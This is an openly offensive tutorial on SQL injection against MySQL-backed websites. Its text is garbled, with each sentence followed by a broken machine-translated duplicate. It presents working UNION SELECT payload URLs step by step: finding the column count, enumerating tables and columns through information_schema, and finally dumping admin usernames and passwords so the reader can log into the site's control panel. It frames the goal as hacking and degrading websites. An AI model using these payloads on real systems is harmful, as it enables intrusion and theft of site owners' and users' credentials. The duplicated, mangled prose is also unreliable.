Structured Query Language injection tutorial (MySQL)

 

SQLI (also known as SQL injection or structured query language injection) is the first step in getting started by exploiting or hacking websites and degrading them. It is easily done and it is a great starting off point. sqli is just basically injecting queries into a database or using queries to get authorization bypass as an admin. this is easy to do, and it is a great shutdown point. sqli is basically injected into the database for query, or the query is used to obtain the Administrator's authorization bypass.

 

How is it done: www.2cto.com How it is done:

 

First, you need to find an sqli vulnerabel site for example: First, you need to find the SQLI vulnerabel site, for example:

A http://www.bkjia.com/index. php? Id = 3

 

To check that it is vulnerable all you have to do is put a 'at the end of the url. to check whether it is fragile, all you need to do is "at the end of the URL. So now your url shocould look like this: So, your url should be like this:

A http://www.bkjia.com/index. php? Id = 3'

 

Press enter and you get some kind of error. Press enter and you will get an error. The errors will vary but it shoshould look something like this error will be different, but it should look like this

Http://i982.photobucket.com/albums/ae308/blink1337/1.pnghttp://i982.photobucket.com/albums/ae308/blink1337/1.png

Or it wowould display like this: mysql error syntax ...... otherwise, the MySQL error syntax will be displayed ......

 

If an error happends that site is vulerable! If an error occurs in happends, the website is vulerable! Now we can start or proper injection... hehehhe. LOL Now we can start or inject... hehehhe. LOL

 

Getting Number of Columns get the Number of Columns

 

After finding your vulnerable site the first step you need to take is to find the number of columns. the first step you need to take is to find the number of columns for your website. The easiest way to do this is use the statement "order by". The simplest way to do this is to use the statement "". All you have to do is put order by (number) All you have to do is place the ORDER (Quantity)

At the end of your url. So it shoshould look like this: Therefore, it should look like this:

 

A http://www.bkjia.com/index. php? Id = 3 order by 1

 

You shoshould start with order by 1 and keep increasing the number by 1 until you get an error. 1, You should start increasing the number 1 until you get an error.

 

It shoshould look like this: It should look like this:

A http://www.bkjia.com/index. php? Id = 3 order by 1

A http://www.bkjia.com/index. php? Id = 3 order by 2

A http://www.bkjia.com/index. php? Id = 3 order by 3

A http://www.bkjia.com/index. php? Id = 3 order by 4

A http://www.bkjia.com/index. php? Id = 3 order by 5

A http://www.bkjia.com/index. php? Id = 3 order by 6

 

If you get an error at the 7th order, then there are only 6 columns for you to insert for the command If you are wrong in the seventh order, then you only have 6 columns of insert command for you

 

Union select all union select all

 

 

..

 

Finding Acsessable Columns search for Acsessable Columns

 

Now that we have the number of columns we need to get the column numbers that we can grab information from. we do this by using the "Union" "select" and Number of columns. now we have the number of columns we need. We can capture the information from. the "select" and columns of the "Consortium" used by We are composed of a series. You put them together in your url like this: (Put "-" after the string "= ") you put them together on your web site as follows: (put the string "=" after ")

 

A http://www.bkjia.com/index. php? Id =-3 union select 1, 2, 4, 5, 6

 

After you do that you shoshould get something like this... when you do, you should get this...

Http://i982.photobucket.com/albums/ae308/blink1337/3.pnghttp://i982.photobucket.com/albums/ae308/blink1337/3.png

The page shoshould look a bit messed up and there shoshould be 2 numbers or more on the page (That depend actually ). the page should look a bit messy and should have 2 numbers or more pages (depending on the actual ). These numbers are the column numbers we can get information from. These numbers are column numbers. we can get information from. We will replace them with statements later on so write them down or remember them. We will write them down or remember them after replacing the report.

 

Find the MySQL Database Version in Finding MySQL Database Version

Put @ version on the desired numbers for example you choose no. Place the required number, for example, you do not select @ VERSION. 1 1

 

A http://www.bkjia.com/index. php? Id =-3 union select @ version, 2, 3, 4, 5, 6

 

Press enter and now the page shocould display the database number. Press enter. the number of databases is displayed on the page.

Http://i982.photobucket.com/albums/ae308/blink1337/4.pnghttp://i982.photobucket.com/albums/ae308/blink1337/4.png

Now the number that we had in the first step will be replaced with the database number. Now, the number of databases in the first step will be replaced. As it shows above. Because it is displayed above. The site that I am testing has a version number of 5.0.45. The website I tested has a version number of 5.0.45. Since this number is 5 or above we will continue working on this site. Since this number is 5 or above, we will continue to work on this site.

 

Finding the Tables query table

Next we are going to inject the website to find the table names. Next, the name of the table found on the website to be injected. We do this by replacing @ version with "group_concat (table_name)" and also add "+ from + information_schema.tables + where + table_schema = database () -- "after the last number in our url. let's do "GROUP_CONCAT (TABLE_NAME)" and add "++ information_schema.tables + + TABLE_SCHEMA database () --". Then, replace @ VERSION with the last number in our URL.

 

A http://www.bkjia.com/index. php? Id =-3 union select all group_concat (table_name), 2, 3, 4, 5, 6 + from information_schema.tables + where + table_schema = database ()--

 

The page shoshould now show the Table names. now, The Table name should be displayed on this page. You may want to write them down. You may need to write them down.

Http://i982.photobucket.com/albums/ae308/blink1337/untitled-1.pnghttp://i982.photobucket.com/albums/ae308/blink1337/untitled-1.png

Finding Column Names search for Column Names

 

This is exactly like getting table names you just change table_name to column_name and information_schema.tables to information_schema.columns. to get the table name, you only need to change TABLE_NAME column_name and information_schema.tables ion_schema.columns

So your url shoshould look like. So your url should look like.

 

A http://www.bkjia.com/index. php? Id =-3 union select all group_concat (column_name), 2, 3, 4, 5, 6 + from information_schema.columns + where + table_schema = database ()--

 

Now, the page shoshould display the following column names; password, username, email, name, id, date created, last login, etc. (Once again it depends) Now, the following column name, password, user name, email, name, ID, creation date, Last login, etc. should be displayed on the page (Once again, it depends on)

 

Getting Information

 

Now that we have the database name, table names, and column names we can put them together and pull information from them. now we have the database name, table name, and column name. We can put them together and pull them from their information. To do to this we need to put the following in our url. To do this, we need to set our url below.

 

The column names shocould be inserted in the group_concat () section and table_name shocould be inserted after the from, therefore you shocould omit the + from + information_schema.columns + where + table_schema = database () -- just like this: the column name should be inserted into GROUP_CONCAT (). TABLE_NAME should be inserted from the back. Therefore, you should omit ++ information_schema.columns ++ TABLE_SCHEMA = database () -Like this:

 

This is the last part of the code:

 

A http://www.bkjia.com/index. php? Id =-3 union select group_concat (username, 0x3a, password), 2, 3, 4, 5, 6 + from + admin

 

(NOte: 0x3a is used as a separator) (NOte: 0x3a is used as the separator)

Then poof you just got the login name and the password... all you need to do is to find the admin cpanel and login the required information. then, you just got the login name and password ...... all you need to do is to find the Administrator's cPanel and the information needed for logon.